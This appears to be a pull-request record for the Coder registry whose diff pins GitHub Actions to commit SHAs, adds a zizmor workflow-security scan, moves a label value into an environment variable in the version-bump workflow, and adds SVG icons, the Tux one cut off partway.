feat(coder-labs/modules/codex): update default configuration to use model providers instead of profiles (#806)

## Description
- update default configuration to use model providers instead of
profiles

## Type of Change

- [ ] New module
- [ ] New template
- [ ] Bug fix
- [x] Feature/enhancement
- [ ] Documentation
- [ ] Other

## Module Information

<!-- Delete this section if not applicable -->

**Path:** `registry/coder-labs/modules/codex`  
**New version:** `v4.3.1`  
**Breaking change:** [ ] Yes [x] No

## Testing & Validation

- [x] Tests pass (`bun test`)
- [x] Code formatted (`bun fmt`)
- [x] Changes tested locally

## Related Issues

<!-- Link related issues or write "None" if not applicable -->

.github/workflows/check_registry_site_health.yaml

@@ -11,7 +11,7 @@ jobs:
 
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v6
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
 
       - name: Run check.sh
         run: |

.github/workflows/ci.yaml

@@ -1,7 +1,7 @@
 name: CI
 on:
   pull_request:
-    branches: [main]
+
 # Cancel in-progress runs for pull requests when developers push new changes
 concurrency:
   group: ${{ github.workflow }}-${{ github.ref }}
@@ -12,9 +12,9 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Check out code
-        uses: actions/checkout@v6
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
       - name: Detect changed files
-        uses: dorny/paths-filter@v3
+        uses: dorny/paths-filter@fbd0ab8f3e69293af611ebaee6363fc25e6d187d # v4.0.1
         id: filter
         with:
           list-files: shell
@@ -37,9 +37,9 @@ jobs:
             all:
               - '**'
       - name: Set up Terraform
-        uses: coder/coder/.github/actions/setup-tf@main
+        uses: coder/coder/.github/actions/setup-tf@1a774ab7ce99063a2e01beb94de3fcbccaf84dbe # v2.31.5
       - name: Set up Bun
-        uses: oven-sh/setup-bun@v2
+        uses: oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6 # v2
         with:
           # We're using the latest version of Bun for now, but it might be worth
           # reconsidering. They've pushed breaking changes in patch releases
@@ -80,20 +80,20 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Check out code
-        uses: actions/checkout@v6
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
       - name: Install Bun
-        uses: oven-sh/setup-bun@v2
+        uses: oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6 # v2
         with:
           bun-version: latest
       # Need Terraform for its formatter
       - name: Install Terraform
-        uses: coder/coder/.github/actions/setup-tf@main
+        uses: coder/coder/.github/actions/setup-tf@1a774ab7ce99063a2e01beb94de3fcbccaf84dbe # v2.31.5
       - name: Install dependencies
         run: bun install
       - name: Validate formatting
         run: bun fmt:ci
       - name: Check for typos
-        uses: crate-ci/typos@v1.42.0
+        uses: crate-ci/typos@631208b7aac2daa8b707f55e7331f9112b0e062d # v1.44.0
         with:
           config: .github/typos.toml
   validate-readme-files:
@@ -104,9 +104,9 @@ jobs:
     needs: validate-style
     steps:
       - name: Check out code
-        uses: actions/checkout@v6
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
       - name: Set up Go
-        uses: actions/setup-go@v6
+        uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6
         with:
           go-version: "1.24.0"
       - name: Validate contributors

.github/workflows/deploy-registry.yaml

@@ -28,7 +28,7 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@v6
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
       - name: Authenticate with Google Cloud
         uses: google-github-actions/auth@7c6bc770dae815cd3e89ee6cdf493a5fab2cc093
         with:

.github/workflows/golangci-lint.yml

@@ -14,11 +14,11 @@ jobs:
     name: lint
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v6
-      - uses: actions/setup-go@v6
+      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+      - uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6
         with:
           go-version: stable
       - name: golangci-lint
-        uses: golangci/golangci-lint-action@v9
+        uses: golangci/golangci-lint-action@1e7e51e771db61008b38414a730f564565cf7c20 # v9
         with:
           version: v2.1

.github/workflows/release.yml

@@ -14,7 +14,7 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@v6
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
         with:
           fetch-depth: 0
           persist-credentials: false
@@ -89,9 +89,9 @@ jobs:
 
           for sha in $MODULE_COMMIT_SHAS; do
             SHORT_SHA=${sha:0:7}
-            
+
             COMMIT_LINES=$(echo "$FULL_CHANGELOG" | grep -E "$SHORT_SHA|$(git log --format='%s' -n 1 $sha)" || true)
-            
+
             if [ -n "$COMMIT_LINES" ]; then
               FILTERED_CHANGELOG="${FILTERED_CHANGELOG}${COMMIT_LINES}\n"
             else

.github/workflows/version-bump.yaml

@@ -20,26 +20,28 @@ jobs:
       issues: write
     steps:
       - name: Checkout code
-        uses: actions/checkout@v6
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
         with:
           fetch-depth: 0
           token: ${{ secrets.GITHUB_TOKEN }}
 
       - name: Set up Bun
-        uses: oven-sh/setup-bun@v2
+        uses: oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6 # v2
         with:
           bun-version: latest
 
       - name: Set up Terraform
-        uses: coder/coder/.github/actions/setup-tf@main
+        uses: coder/coder/.github/actions/setup-tf@1a774ab7ce99063a2e01beb94de3fcbccaf84dbe # v2.31.5
 
       - name: Install dependencies
         run: bun install
 
       - name: Extract bump type from label
+        env:
+          LABEL_NAME: ${{ github.event.label.name }}
         id: bump-type
         run: |
-          case "${{ github.event.label.name }}" in
+          case "$LABEL_NAME" in
             "version:patch")
               echo "type=patch" >> $GITHUB_OUTPUT
               ;;
@@ -50,7 +52,7 @@ jobs:
               echo "type=major" >> $GITHUB_OUTPUT
               ;;
             *)
-              echo "Invalid version label: ${{ github.event.label.name }}"
+              echo "Invalid version label: ${LABEL_NAME}"
               exit 1
               ;;
           esac
@@ -60,7 +62,7 @@ jobs:
 
       - name: Comment on PR - Version bump required
         if: failure()
-        uses: actions/github-script@v8
+        uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
         with:
           github-token: ${{ secrets.GITHUB_TOKEN }}
           script: |

.github/workflows/zizmor.yaml

@@ -0,0 +1,55 @@
+name: GitHub Actions Security Analysis (zizmor)
+
+on:
+  pull_request:
+    branches: ["**"]
+    paths:
+      - ".github/workflows/**"
+  push:
+    branches: ["main"]
+    paths:
+      - ".github/workflows/**"
+  workflow_dispatch:
+
+permissions: {}
+
+jobs:
+  zizmor_pr_blocking:
+    if: github.event_name == 'pull_request'
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      actions: read
+    steps:
+      - name: Checkout repository
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
+
+      - name: Run zizmor (blocking, HIGH only)
+        uses: zizmorcore/zizmor-action@71321a20a9ded102f6e9ce5718a2fcec2c4f70d8 # v0.5.2
+        with:
+          advanced-security: false
+          annotations: true
+          min-severity: high
+          inputs: |
+            .github/workflows
+
+  zizmor_main_sarif:
+    if: github.event_name != 'pull_request'
+    runs-on: ubuntu-latest
+    permissions:
+      security-events: write
+      contents: read
+      actions: read
+    steps:
+      - name: Checkout repository
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        with:
+          persist-credentials: false
+
+      - name: Run zizmor (SARIF)
+        uses: zizmorcore/zizmor-action@71321a20a9ded102f6e9ce5718a2fcec2c4f70d8 # v0.5.2
+        with:
+          inputs: |
+            .github/workflows

.icons/jfrog-xray.svg

@@ -0,0 +1,10 @@
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 200 200" fill="none">
+  <g fill="#40BE46">
+    <!-- Eye shape -->
+    <path d="M100 40C55 40 20 80 10 100c10 20 45 60 90 60s80-40 90-60c-10-20-45-60-90-60zm0 100c-35 0-63-28-75-40 12-12 40-40 75-40s63 28 75 40c-12 12-40 40-75 40z"/>
+    <!-- Inner circle (magnifying glass lens) -->
+    <path d="M100 72a28 28 0 1 0 0 56 28 28 0 0 0 0-56zm0 44a16 16 0 1 1 0-32 16 16 0 0 1 0 32z"/>
+    <!-- Horizontal line below -->
+    <rect x="25" y="170" width="150" height="12" rx="6"/>
+  </g>
+</svg>

.icons/linux.svg

@@ -0,0 +1,438 @@
+<?xml version="1.0" encoding="utf-8"?>
+<svg version="1.1" viewBox="0 0 216 256" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+	<title>Tux</title>
+	<defs id="tux_fx">
+		<linearGradient id="gradient_belly_shadow">
+			<stop offset="0" stop-color="#000000"/>
+			<stop offset="1" stop-color="#000000" stop-opacity="0.25"/>
+		</linearGradient>
+		<linearGradient id="gradient_wing_tip_right_shadow">
+			<stop offset="0"    stop-color="#110800"/>
+			<stop offset="0.59" stop-color="#a65a00" stop-opacity="0.8"/>
+			<stop offset="1"    stop-color="#ff921e" stop-opacity="0"/>
+		</linearGradient>
+		<linearGradient id="gradient_wing_tip_right_glare_1">
+			<stop offset="0" stop-color="#7c7c7c"/>
+			<stop offset="1" stop-color="#7c7c7c" stop-opacity="0.33"/>
+		</linearGradient>
+		<linearGradient id="gradient_wing_tip_right_glare_2">
+			<stop offset="0" stop-color="#7c7c7c"/>
+			<stop offset="1" stop-color="#7c7c7c" stop-opacity="0.33"/>
+		</linearGradient>
+		<linearGradient id="gradient_foot_left_layer_1">
+			<stop offset="0" stop-color="#b98309"/>
+			<stop offset="1" stop-color="#382605"/>
+		</linearGradient>
+		<linearGradient id="gradient_foot_left_glare">
+			<stop offset="0" stop-color="#ebc40c"/>
+			<stop offset="1" stop-color="#ebc40c" stop-opacity="0"/>
+		</linearGradient>
+		<linearGradient id="gradient_foot_right_shadow">
+			<stop offset="0" stop-color="#000000"/>
+			<stop offset="1" stop-color="#000000" stop-opacity="0"/>
+		</linearGradient>
+		<linearGradient id="gradient_foot_right_layer_1">
+			<stop offset="0" stop-color="#3e2a06"/>
+			<stop offset="1" stop-color="#ad780a"/>
+		</linearGradient>
+		<linearGradient id="gradient_foot_right_glare">
+			<stop offset="0" stop-color="#f3cd0c"/>
+			<stop offset="1" stop-color="#f3cd0c" stop-opacity="0"/>
+		</linearGradient>
+		<linearGradient id="gradient_eyeball">
+			<stop offset="0"    stop-color="#fefefc"/>
+			<stop offset="0.75" stop-color="#fefefc"/>
+			<stop offset="1"    stop-color="#d4d4d4"/>
+		</linearGradient>
+		<linearGradient id="gradient_pupil_left_glare">
+			<stop offset="0"    stop-color="#757574" stop-opacity="0"/>
+			<stop offset="0.25" stop-color="#757574"/>
+			<stop offset="0.5"  stop-color="#757574"/>
+			<stop offset="1"    stop-color="#757574" stop-opacity="0"/>
+		</linearGradient>
+		<linearGradient id="gradient_pupil_right_glare_2">
+			<stop offset="0"   stop-color="#949494" stop-opacity="0.39"/>
+			<stop offset="0.5" stop-color="#949494"/>
+			<stop offset="1"   stop-color="#949494" stop-opacity="0.39"/>
+		</linearGradient>
+		<linearGradient id="gradient_eyelid_left">
+			<stop offset="0" stop-color="#c8c8c8"/>
+			<stop offset="1" stop-color="#797978"/>
+		</linearGradient>
+		<linearGradient id="gradient_eyelid_right">
+			<stop offset="0"    stop-color="#747474"/>
+			<stop offset="0.13" stop-color="#8c8c8c"/>
+			<stop offset="0.25" stop-color="#a4a4a4"/>
+			<stop offset="0.5"  stop-color="#d4d4d4"/>
+			<stop offset="0.62" stop-color="#d4d4d4"/>
+			<stop offset="1"    stop-color="#7c7c7c"/>
+		</linearGradient>
+		<linearGradient id="gradient_eyebrow">
+			<stop offset="0"    stop-color="#646464" stop-opacity="0"/>
+			<stop offset="0.31" stop-color="#646464" stop-opacity="0.58"/>
+			<stop offset="0.47" stop-color="#646464"/>
+			<stop offset="0.73" stop-color="#646464" stop-opacity="0.26"/>
+			<stop offset="1"    stop-color="#646464" stop-opacity="0"/>
+		</linearGradient>
+		<linearGradient id="gradient_beak_base">
+			<stop offset="0"    stop-color="#020204"/>
+			<stop offset="0.73" stop-color="#020204"/>
+			<stop offset="1"    stop-color="#5c5c5c"/>
+		</linearGradient>
+		<linearGradient id="gradient_mandible_lower">
+			<stop offset="0"    stop-color="#d2940a"/>
+			<stop offset="0.75" stop-color="#d89c08"/>
+			<stop offset="0.87" stop-color="#b67e07"/>
+			<stop offset="1"    stop-color="#946106"/>
+		</linearGradient>
+		<linearGradient id="gradient_mandible_upper">
+			<stop offset="0"    stop-color="#ad780a"/>
+			<stop offset="0.12" stop-color="#d89e08"/>
+			<stop offset="0.25" stop-color="#edb80b"/>
+			<stop offset="0.39" stop-color="#ebc80d"/>
+			<stop offset="0.53" stop-color="#f5d838"/>
+			<stop offset="0.77" stop-color="#f6d811"/>
+			<stop offset="1"    stop-color="#f5cd31"/>
+		</linearGradient>
+		<linearGradient id="gradient_nares">
+			<stop offset="0"    stop-color="#3a2903"/>
+			<stop offset="0.55" stop-color="#735208"/>
+			<stop offset="1"    stop-color="#ac8c04"/>
+		</linearGradient>
+		<linearGradient id="gradient_beak_corner">
+			<stop offset="0" stop-color="#f5ce2d"/>
+			<stop offset="1" stop-color="#d79b08"/>
+		</linearGradient>
+		<radialGradient id="fill_belly_shadow_left" href="#gradient_belly_shadow" xlink:href="#gradient_belly_shadow"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(61.18,121.19) scale(19,18)"/>
+		<radialGradient id="fill_belly_shadow_right" href="#gradient_belly_shadow" xlink:href="#gradient_belly_shadow"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(125.74,131.6) scale(23.6,18)"/>
+		<radialGradient id="fill_belly_shadow_middle" href="#gradient_belly_shadow" xlink:href="#gradient_belly_shadow"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(94.21,127.47) scale(9.35,10)"/>
+		<linearGradient id="fill_foot_left_base" href="#gradient_foot_left_layer_1" xlink:href="#gradient_foot_left_layer_1"
+			gradientUnits="userSpaceOnUse" x1="23.18" y1="193.01" x2="64.31" y2="262.02"/>
+		<linearGradient id="fill_foot_left_glare" href="#gradient_foot_left_glare" xlink:href="#gradient_foot_left_glare"
+			gradientUnits="userSpaceOnUse" x1="64.47" y1="210.83" x2="77.41" y2="235.21"/>
+		<linearGradient id="fill_foot_right_shadow" href="#gradient_foot_right_shadow" xlink:href="#gradient_foot_right_shadow"
+			gradientUnits="userSpaceOnUse" x1="146.93" y1="211.96" x2="150.2" y2="235.73"/>
+		<linearGradient id="fill_foot_right_base" href="#gradient_foot_right_layer_1" xlink:href="#gradient_foot_right_layer_1"
+			gradientUnits="userSpaceOnUse" x1="151.5" y1="253.02" x2="192.94" y2="185.84"/>
+		<linearGradient id="fill_foot_right_glare" href="#gradient_foot_right_glare" xlink:href="#gradient_foot_right_glare"
+			gradientUnits="userSpaceOnUse" x1="162.81" y1="180.67" x2="161.59" y2="191.64"/>
+		<radialGradient id="fill_wing_tip_right_shadow_lower" href="#gradient_wing_tip_right_shadow" xlink:href="#gradient_wing_tip_right_shadow"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(169.71,194.53) rotate(15) scale(19.66,20.64)"/>
+		<radialGradient id="fill_wing_tip_right_shadow_upper" href="#gradient_wing_tip_right_shadow" xlink:href="#gradient_wing_tip_right_shadow"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(169.71,189.89) rotate(-2.42) scale(19.74,14.86)"/>
+		<radialGradient id="fill_wing_tip_right_glare_1" href="#gradient_wing_tip_right_glare_1" xlink:href="#gradient_wing_tip_right_glare_1"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(184.65,176.62) rotate(23.5) scale(6.95,3.21)"/>
+		<linearGradient id="fill_wing_tip_right_glare_2" href="#gradient_wing_tip_right_glare_2" xlink:href="#gradient_wing_tip_right_glare_2"
+			gradientUnits="userSpaceOnUse" x1="165.69" y1="173.58" x2="168.27" y2="173.47"/>
+		<radialGradient id="fill_eyeball_left" href="#gradient_eyeball" xlink:href="#gradient_eyeball"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(86.49,51.41) rotate(-0.6) scale(10.24,15.68)"/>
+		<linearGradient id="fill_pupil_left_glare" href="#gradient_pupil_left_glare" xlink:href="#gradient_pupil_left_glare"
+			gradientUnits="userSpaceOnUse" x1="84.29" y1="46.64" x2="89.32" y2="55.63"/>
+		<radialGradient id="fill_eyelid_left" href="#gradient_eyelid_left" xlink:href="#gradient_eyelid_left"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(84.89,43.74) rotate(-9.35) scale(6.25,5.77)"/>
+		<linearGradient id="fill_eyebrow_left" href="#gradient_eyebrow" xlink:href="#gradient_eyebrow"
+			gradientUnits="userSpaceOnUse" x1="83.59" y1="32.51" x2="94.48" y2="43.63"/>
+		<radialGradient id="fill_eyeball_right" href="#gradient_eyeball" xlink:href="#gradient_eyeball"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(118.06,51.41) rotate(-1.8) scale(13.64,15.68)"/>
+		<linearGradient id="fill_pupil_right_glare" href="#gradient_pupil_right_glare_2" xlink:href="#gradient_pupil_right_glare_2"
+			gradientUnits="userSpaceOnUse" x1="117.87" y1="47.25" x2="123.66" y2="54.11"/>
+		<linearGradient id="fill_eyelid_right" href="#gradient_eyelid_right" xlink:href="#gradient_eyelid_right"
+			gradientUnits="userSpaceOnUse" x1="112.9" y1="36.23" x2="131.32" y2="47.01"/>
+		<linearGradient id="fill_eyebrow_right" href="#gradient_eyebrow" xlink:href="#gradient_eyebrow"
+			gradientUnits="userSpaceOnUse" x1="119.16" y1="31.56" x2="131.42" y2="43.14"/>
+		<radialGradient id="fill_beak_base" href="#gradient_beak_base" xlink:href="#gradient_beak_base"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(97.64,60.12) rotate(-36) scale(11.44,10.38)"/>
+		<radialGradient id="fill_mandible_lower_base" href="#gradient_mandible_lower" xlink:href="#gradient_mandible_lower"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(109.77,70.61) rotate(-22.4) scale(27.15,19.07)"/>
+		<linearGradient id="fill_mandible_upper_base" href="#gradient_mandible_upper" xlink:href="#gradient_mandible_upper"
+			gradientUnits="userSpaceOnUse" x1="78.09" y1="69.26" x2="126.77" y2="68.88"/>
+		<radialGradient id="fill_naris_left" href="#gradient_nares" xlink:href="#gradient_nares"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(92.11,59.88) scale(1.32,1.42)"/>
+		<radialGradient id="fill_naris_right" href="#gradient_nares" xlink:href="#gradient_nares"
+			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(104.65,59.7) scale(2.78,1.62)"/>
+		<linearGradient id="fill_beak_corner" href="#gradient_beak_corner" xlink:href="#gradient_beak_corner"
+			gradientUnits="userSpaceOnUse" x1="126.74" y1="67.49" x2="126.74" y2="71.09"/>
+		<filter id="blur_belly_shadow_left">
+			<feGaussianBlur stdDeviation="0.64 0.55"/>
+		</filter>
+		<filter id="blur_belly_shadow_right">
+			<feGaussianBlur stdDeviation="0.98"/>
+		</filter>
+		<filter id="blur_belly_shadow_middle">
+			<feGaussianBlur stdDeviation="0.68"/>
+		</filter>
+		<filter id="blur_belly_shadow_lower" x="-0.8" width="2.6" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="1.25"/>
+		</filter>
+		<filter id="blur_belly_glare" x="-0.8" width="2.6" y="-0.5" height="2">
+			<feGaussianBlur stdDeviation="1.78 2.19"/>
+		</filter>
+		<filter id="blur_head_glare" x="-0.3" width="1.6" y="-0.3" height="1.6">
+			<feGaussianBlur stdDeviation="1.73"/>
+		</filter>
+		<filter id="blur_neck_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="0.78"/>
+		</filter>
+		<filter id="blur_wing_left_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="0.98"/>
+		</filter>
+		<filter id="blur_wing_right_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="1.19 1.17"/>
+		</filter>
+		<filter id="blur_foot_left_layer_1" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="3.38"/>
+		</filter>
+		<filter id="blur_foot_left_layer_2">
+			<feGaussianBlur stdDeviation="2.1 2.06"/>
+		</filter>
+		<filter id="blur_foot_left_glare">
+			<feGaussianBlur stdDeviation="0.32"/>
+		</filter>
+		<filter id="blur_foot_right_shadow">
+			<feGaussianBlur stdDeviation="1.95 1.9"/>
+		</filter>
+		<filter id="blur_foot_right_layer_1" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="4.12"/>
+		</filter>
+		<filter id="blur_foot_right_layer_2" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="3.12 3.37"/>
+		</filter>
+		<filter id="blur_foot_right_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="0.41"/>
+		</filter>
+		<filter id="blur_wing_tip_right_shadow_lower" x="-0.3" width="1.6" y="-0.3" height="1.6">
+			<feGaussianBlur stdDeviation="2.45"/>
+		</filter>
+		<filter id="blur_wing_tip_right_shadow_upper" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="1.12 0.81"/>
+		</filter>
+		<filter id="blur_wing_tip_right_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="0.88"/>
+		</filter>
+		<filter id="blur_pupil_left_glare" x="-0.3" width="1.6" y="-0.3" height="1.6">
+			<feGaussianBlur stdDeviation="0.44"/>
+		</filter>
+		<filter id="blur_eyebrow_left">
+			<feGaussianBlur stdDeviation="0.12"/>
+		</filter>
+		<filter id="blur_pupil_right_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="0.45"/>
+		</filter>
+		<filter id="blur_eyebrow_right">
+			<feGaussianBlur stdDeviation="0.13"/>
+		</filter>
+		<filter id="blur_beak_shadow_lower" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="1.75"/>
+		</filter>
+		<filter id="blur_beak_shadow_upper">
+			<feGaussianBlur stdDeviation="0.8 0.74"/>
+		</filter>
+		<filter id="blur_mandible_lower_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="0.77"/>
+		</filter>
+		<filter id="blur_mandible_upper_shadow">
+			<feGaussianBlur stdDeviation="0.65"/>
+		</filter>
+		<filter id="blur_mandible_upper_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="0.73"/>
+		</filter>
+		<filter id="blur_naris_left" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="0.1"/>
+		</filter>
+		<filter id="blur_naris_right">
+			<feGaussianBlur stdDeviation="0.1"/>
+		</filter>
+		<filter id="blur_beak_corner" x="-0.2" width="1.4" y="-0.2" height="1.4">
+			<feGaussianBlur stdDeviation="0.23"/>
+		</filter>
+		<clipPath id="clip_body">
+			<use href="#body_base" xlink:href="#body_base"/>
+		</clipPath>
+		<clipPath id="clip_wing_left">
+			<use href="#wing_left_base" xlink:href="#wing_left_base"/>
+		</clipPath>
+		<clipPath id="clip_wing_right">
+			<use href="#wing_right_base" xlink:href="#wing_right_base"/>
+		</clipPath>
+		<clipPath id="clip_foot_left">
+			<use href="#foot_left_base" xlink:href="#foot_left_base"/>
+		</clipPath>
+		<clipPath id="clip_foot_right">
+			<use href="#foot_right_base" xlink:href="#foot_right_base"/>
+		</clipPath>
+		<clipPath id="clip_wing_tip_right">
+			<use href="#wing_tip_right_base" xlink:href="#wing_tip_right_base"/>
+		</clipPath>
+		<clipPath id="clip_eye_left">
+			<use href="#eyeball_left" xlink:href="#eyeball_left"/>
+		</clipPath>
+		<clipPath id="clip_pupil_left">
+			<use href="#pupil_left_base" xlink:href="#pupil_left_base"/>
+		</clipPath>
+		<clipPath id="clip_eye_right">
+			<use href="#eyeball_right" xlink:href="#eyeball_right"/>
+		</clipPath>
+		<clipPath id="clip_pupil_right">
+			<use href="#pupil_right_base" xlink:href="#pupil_right_base"/>
+		</clipPath>
+		<clipPath id="clip_mandible_lower">
+			<use href="#mandible_lower_base" xlink:href="#mandible_lower_base"/>
+		</clipPath>
+		<clipPath id="clip_mandible_upper">
+			<use href="#mandible_upper_base" xlink:href="#mandible_upper_base"/>
+		</clipPath>
+		<clipPath id="clip_beak">
+			<use href="#mandible_lower_base" xlink:href="#mandible_lower_base"/>
+			<use href="#mandible_upper_base" xlink:href="#mandible_upper_base"/>
+		</clipPath>
+	</defs>
+	<g id="tux">
+		<g id="body">
+			<path id="body_base" fill="#020204"
+				d="m 106.95,0 c -6,0 -12.02,1.18 -17.46,4.12 -5.78,3.11 -10.52,8.09 -13.43,13.97 -2.92,5.88 -4.06,12.16 -4.24,19.08 -0.33,13.14 0.3,26.92 1.29,39.41 0.26,3.8 0.74,6.02 0.25,9.93 -1.62,8.3 -8.88,13.88 -12.76,21.17 -4.27,8.04 -6.07,17.13 -9.29,25.65 -2.95,7.79 -7.09,15.1 -9.88,22.95 -3.91,10.97 -5.08,23.03 -2.5,34.39 1.97,8.66 6.08,16.78 11.62,23.73 -0.8,1.44 -1.58,2.91 -2.4,4.34 -2.57,4.43 -5.71,8.64 -7.17,13.55 -0.73,2.45 -1.02,5.07 -0.55,7.59 0.47,2.52 1.75,4.93 3.75,6.53 1.31,1.04 2.9,1.72 4.53,2.1 1.63,0.37 3.32,0.46 5,0.43 6.37,-0.14 12.55,-2.07 18.71,-3.69 3.66,-0.96 7.34,-1.81 11.03,-2.58 13.14,-2.69 27.8,-1.61 39.99,0.15 4.13,0.63 8.23,1.44 12.29,2.43 6.36,1.54 12.69,3.5 19.23,3.69 1.72,0.05 3.46,-0.03 5.14,-0.4 1.68,-0.38 3.31,-1.06 4.65,-2.13 2.01,-1.6 3.29,-4.02 3.76,-6.54 0.47,-2.52 0.18,-5.15 -0.56,-7.61 -1.48,-4.92 -4.65,-9.11 -7.27,-13.52 -1.04,-1.75 -2,-3.53 -3.03,-5.28 7.9,-8.87 14.26,-19.13 17.94,-30.4 4.01,-12.3 4.75,-25.55 3.06,-38.38 -1.69,-12.83 -5.76,-25.27 -11.11,-37.05 -6.72,-14.76 -12.37,-20.1 -16.47,-33.07 -4.42,-14.02 -0.77,-30.61 -4.06,-43.32 -1.17,-4.32 -3.04,-8.45 -5.45,-12.23 -2.82,-4.43 -6.4,-8.39 -10.65,-11.47 -6.78,-4.92 -15.3,-7.54 -23.96,-7.54 z"/>
+			<path id="belly" fill="#fdfdfb"
+				d="m 83.13,74 c -0.9,1.13 -1.48,2.49 -1.84,3.89 -0.35,1.4 -0.48,2.85 -0.54,4.3 -0.11,2.89 0.07,5.83 -0.7,8.62 -0.82,2.98 -2.65,5.57 -4.44,8.08 -3.11,4.36 -6.25,8.84 -7.78,13.97 -0.93,3.1 -1.24,6.39 -0.91,9.62 -3.47,5.1 -6.48,10.53 -8.98,16.18 -3.78,8.57 -6.37,17.69 -7.28,27.01 -1.12,11.41 0.34,23.15 4.85,33.69 3.25,7.63 8.11,14.6 14.38,20.04 3.18,2.76 6.72,5.11 10.5,6.97 13.11,6.45 29.31,6.46 42.2,-0.41 6.74,-3.59 12.43,-8.84 17.91,-14.15 3.3,-3.2 6.59,-6.48 9.11,-10.32 4.85,-7.41 6.54,-16.41 7.59,-25.2 1.83,-15.36 1.89,-31.6 -4.85,-45.53 -2.32,-4.8 -5.41,-9.22 -9.12,-13.05 -0.98,-6.7 -2.93,-13.27 -5.76,-19.42 -2.05,-4.45 -4.54,-8.68 -6.44,-13.18 -0.78,-1.85 -1.46,-3.75 -2.32,-5.56 -0.87,-1.81 -1.93,-3.55 -3.39,-4.94 -1.48,-1.42 -3.33,-2.43 -5.28,-3.07 -1.95,-0.65 -4.01,-0.94 -6.06,-1.04 -4.11,-0.21 -8.22,0.33 -12.33,0.16 -3.27,-0.13 -6.53,-0.7 -9.8,-0.51 -1.63,0.1 -3.26,0.39 -4.78,1.01 -1.52,0.61 -2.92,1.56 -3.94,2.84 z"/>
+			<g id="body_self_shadows">
+				<path id="belly_shadow_left" opacity="0.25" fill="url(#fill_belly_shadow_left)" filter="url(#blur_belly_shadow_left)" clip-path="url(#clip_body)"
+					d="m 68.67,115.18 c 0.87,1.31 -0.55,5.84 19.86,2.94 0,0 -3.59,0.39 -7.12,1.21 -5.49,1.84 -10.27,3.89 -13.97,6.61 -3.65,2.7 -6.33,6.21 -9.68,9.22 0,0 5.43,-9.92 6.78,-12.91 1.36,-2.99 -0.22,-2.85 0.85,-7.25 1.07,-4.4 3.69,-8.63 3.69,-8.63 0,0 -2.14,6.22 -0.41,8.81 z"/>
+				<path id="belly_shadow_right" opacity="0.42" fill="url(#fill_belly_shadow_right)" filter="url(#blur_belly_shadow_right)" clip-path="url(#clip_body)"
